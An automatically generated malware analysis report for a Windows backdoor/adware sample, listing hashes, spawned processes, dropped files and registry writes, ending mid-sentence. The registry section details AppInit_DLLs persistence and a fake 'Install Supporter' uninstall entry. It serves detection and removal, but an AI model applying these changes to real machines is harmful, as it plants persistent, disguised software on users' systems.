Backdoor.Win32.PcClient_efd952ab4b

by malwarelabrobot on October 3rd, 2014 in Malware Descriptions.

not-a-virus:AdWare.Win32.MultiPlug.bwof (Kaspersky), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Backdoor, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: efd952ab4bdc43976f26649917fafe30
SHA1: 856d83f4e556896238763888ef6974d3cf72a9b9
SHA256: 6ffdd764fe0da9f334551d204b546511c3a1e6d2043a8e6eee7e9c8aa1ae783c
SSDeep: 6144:RrJbUzkuvcBYC47l2xb8YFZu5i/ 4G/7No3t01tO768G Conw15:Rr6kuveY33sZmi/ To3tKtO768Hnw15
Size: 322176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: ShowAppIt
Created at: 2013-03-12 10:51:45
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

putfu.exe:1100
usetup.exe:644
rundll32.exe:1252
rundll32.exe:1972
Upd Inst.exe:1788
Upd Inst.exe:212
%original file name%.exe:1936

The Backdoor injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process putfu.exe:1100 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\Assistant.dll (264574 bytes)
%Program Files%\AssistantSvc.dll (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)

The process usetup.exe:644 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\Upd Inst.exe (26080 bytes)

The process Upd Inst.exe:212 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%WinDir%\Tasks\Upd Inst-S-3301306948.job (648 bytes)
%Documents and Settings%\All Users\Application Data\ShowAppIt\Upd Inst\3301306948.ini (36300 bytes)

The process %original file name%.exe:1936 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].txt (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B} (4 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuE7C96BC7.dll (2569 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.dat (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AE3B6594.dat (16424 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.usetup.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin9E1A.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.putfu.exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1_1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\efd952ab4bdc43976f26649917fafe30.log (1671022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\1_1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.putfu.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\r1.loversion[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons\usetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons\putfu.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuE7C96BC7.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.usetup.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin9E1A.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AE3B6594.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x86 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.loversion[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1_1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (0 bytes)

Registry activity

The process putfu.exe:1100 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"data.1" = "jms9X5UQCQC/qdefABMMWdqbSPhBjrBeg2kltM6CV9laMoFMFie5D3 I3Cy gz98JM4V6i4T4Y0qkyk2B2o63bLcdN ZyLASrmsuJ3"
"date" = "1412210293"
"data.0" = "tMzCW3FyIL1BGncdefOSb9YJfudMlwX/b8Ua0F9BwvC8b3rxI9YbqXR6Up/bNSoruW7pgx1JQIKE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"CategoryName" = ""

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"51d2f2ea" = "RPAj/YV/c/Ay/Xl/a//x/WV/cPAl/Y//alAf/YP/GPAf/B//VP/j/Cx/V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"usr.0" = "lzlOIzOQIKEG xztvq"
"usr.1" = "gzR24bxztvqomjlhab"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"916e5338" = "%Program Files%\Assistant.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\ASSIST~1.DLL,_uninstall /un /uq"
"NoRepair" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"uuid" = "baadc0de-baadbeef-a8a67a25"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c5705860" = "Vx////%%"
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0e93c3f3" = "///%"
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f0bf0bde" = "///%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"65114b36" = "Vl/l////"
"e46c271e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"414bc593" = "///%"
"c24899a6" = "MP/f/CF/Mx/l/C/////%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"dlpath" = "c:\progra~1\assist~1.dll"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svi" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0dc3ee96" = "/P////%%"
"7367429f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svpath" = "c:\progra~1\AssistantSvc.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"LRTS" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f0bf0bde" = "///%"
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"NoModify" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\ASSIST~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 03 90 46 EB 53 8A B4 55 EF 6D 33 5A 88 47 EB"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Install_Dir" = "%Program Files%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"iiid" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"2d71d5ab" = "V/////%%"
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0c230bcb" = "///%"
"72758a5d" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"51d2f2ea" = "RPAj/YV/c/Ay/Xl/a//x/WV/cPAl/Y//alAf/YP/GPAf/B//VP/j/Cx/V/////%%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"iiid" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "c:\progra~1\assist~1.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"LRTS" = "0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"n" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"data.0" = "tMzCW3FyIL1BGncdefOSb9YJfudMlwX/b8Ua0F9BwvC8b3rxI9YbqXR6Up/bNSoruW7pgx1JQIKE"
"data.1" = "jms9X5UQCQC/qdefABMMWdqbSPhBjrBeg2kltM6CV9laMoFMFie5D3 I3Cy gz98JM4V6i4T4Y0qkyk2B2o63bLcdN ZyLASrmsuJ3"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Mode" = "4026531840"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a2e3b941" = "///%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"Publisher" = "Certified Publisher"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"InstallDate" = "20131002"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"414bc593" = "///%"
"587b5709" = "V/////%%"
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"usr.1" = "gzR24bxztvqomjlhab"
"usr.0" = "lzlOIzOQIKEG xztvq"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"7f69fa1f" = "///%"
"72758a5d" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"uuid" = "baadc0de-baadbeef-a8a67a25"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"8b9e4cbc" = "V/////%%"

"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"Version" = "22021985"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{916e5338}]
"DisplayName" = "Install Supporter 1.80"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"date" = "1412210293"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svn" = "Install Supporter"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"svx" = ""
"svt" = "1412210293"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"State" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

